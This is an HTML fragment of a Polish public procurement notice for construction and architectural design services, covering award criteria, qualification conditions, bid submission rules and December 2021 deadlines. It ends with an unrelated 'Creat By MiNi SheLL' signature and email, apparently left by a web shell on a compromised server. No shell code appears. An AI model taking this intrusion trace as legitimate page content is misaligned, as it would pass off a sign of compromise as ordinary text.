100).<br/>Ocenie będą podlegały oferty niepodlegające odrzuceniu.<br/>Obliczenie będzie dokonywane z dokładnością do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta branży konstrukcyjnej oraz architektonicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Dotyczy części nr 1,2,3 Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponował co najmniej 1 osobą, która będzie uczestniczyć w wykonaniu zamówienia posiadającą uprawnienia budowlane, o których mowa w ustawie Prawo budowlane oraz w Rozporządzeniu Ministra Transportu i Budownictwa z dnia 29 kwietnia 2019 r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz.U. z 2019 r. poz. 831 z późn. zm.) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa, lub odpowiednich przepisów obowiązujących na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ, zgodnie z ustawą z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej Dz. U. z 2018 r. poz.2272, z 2019 r. poz. 534 i 577) lub zamierzającymi świadczyć usługi transgraniczne w rozumieniu przepisów tej ustawy oraz art. 20a ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U z 2013, poz. 932 z późn. zm.) w zakresie projektowania w specjalności konstrukcyjnej oraz architektonicznej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Dotyczy części nr 1,2,3 Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, (określonych w Rozdziale VI pkt. 1.4.1 a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga złożenia podmiotowych środków dowodowych na<br/>potwierdzenie niepodleganiu wykluczeniu</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga przedmiotowych środków dowodowych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dotyczy wszystkich części Oferta musi spełniać następujące wymogi:1) musi być sporządzona w<br/>języku polskim w postaci elektronicznej w formacie danych zgodnym z formatami wyszczególnionymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego lub konkursie – zaleca się sporządzenie oferty w formatach<br/>.doc, .docx, .pdf . Ofertę należy złożyć, pod rygorem nieważności w formie elektronicznej, tj. w<br/>postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym przez osobę/y<br/>uprawnioną/e. Przez osobę/y uprawnioną/e należy rozumieć odpowiednio:a) osobę/y, która/e<br/>zgodnie z odpowiednimi przepisami jest/są uprawniona/e do składania oświadczeń woli w<br/>zakresie praw i obowiązków majątkowych wykonawcy;b) pełnomocnika/ów wykonawcy, którym<br/>pełnomocnictwa udzieliła/y osoba/y o której/ych mowa w lit. a);c) pełnomocnika ustanowionego<br/>przez wykonawców wspólnie ubiegających się o udzielenie zamówienia.2) dokumenty i/lub<br/>oświadczenia sporządzone w języku obcym muszą być złożone wraz z ich tłumaczeniem na<br/>język polski.3. Wykonawca może zmienić formę graficzną wzorów załączników do SWZ oraz<br/>innych formularzy Zamawiającego jednakże treść zawarta we wzorach Zamawiającego nie może<br/>ulec zmianie.4. Musi zawierać (dokument/y potwierdzający/e umocowanie do reprezentowania<br/>Wykonawcy i/lub podmiotu udostepniającego zasoby ) w celu potwierdzenia, że osoba<br/>działająca w imieniu wykonawcy i/lub podmiotu udostepniającego zasoby jest umocowana do<br/>jego reprezentowania:a) odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca<br/>nie jest zobowiązany do złożenia w/w dokumentów jeżeli zamawiający może je uzyskać za<br/>pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca i/lub podmiot<br/>udostepniający zasoby wskazał dane umożliwiające dostęp do tych dokumentów (w druku oferta<br/>i/lub druku zobowiązania podmiotu udostępniającego zasoby) oraz z zastrzeżeniem ppkt. b)<br/>Jeżeli w imieniu wykonawcy i/lub podmiotu udostepniającego zasoby działa osoba, której<br/>umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w ppkt. a),<br/>zamawiający żąda od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego<br/>umocowanie do reprezentowania wykonawcy i/lub podmiotu udostepniającego zasoby.W<br/>przypadku wykonawców zagranicznych należy dołączyć do OFERTY tłumaczenie niniejszych<br/>dokumentów na język polski. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1 W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty i oświadczenia<br/>wskazane w rozdziale 5.5 i 5.6 OgłoszeniaPozostałe dokumenty będą traktowane jako<br/>wspólne.6.2. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą ustanowić<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy. Do OFERTY należy dołączyć stosowne<br/>pełnomocnictwo w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym przez osobę lub osoby upoważnione do składania<br/>oświadczeń woli każdego z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.6.3. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą<br/>solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną<br/>w art. 366 Kodeksu cywilnego.6.4. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem. 6.5. W formularzu OFERTA w miejscu „nazwa i adres wykonawcy” należy<br/>wpisać dane dotyczące wszystkich podmiotów wspólnie ubiegających się o udzielenie<br/>zamówienie, a nie tylko pełnomocnika.6.6. W formularzu OFERTA należy wskazać, które usługi<br/>wykonają poszczególni wykonawcy wspólnie ubiegający się o udzielenie zamówienia.6.7.<br/>Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań.6.8. Przed<br/>podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne,<br/>których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Mozliwość zmiany zawartej umowy oraz warunki tych zmian zostały określone w<br/>projektowanych postanowieniach umowy dla części 1,2,3 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-21 10:50</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">przy użyciu systemu Platformy Zamówień Publicznych ZETOPZP: https://pzp.hyzne.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-21 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com